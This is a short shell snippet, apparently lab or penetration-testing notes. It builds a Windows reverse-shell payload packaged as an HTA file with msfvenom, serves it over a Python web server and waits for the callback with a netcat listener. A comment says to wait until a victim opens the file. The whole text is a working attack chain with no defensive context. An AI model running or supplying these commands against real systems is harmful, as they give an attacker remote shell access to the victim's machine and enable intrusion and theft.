msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.4 LPORT=8888 -f hta-psh -o revsh.hta
python -m http.server &>/dev/null &
nc -lnvp 8888
# wait til client interact with HTA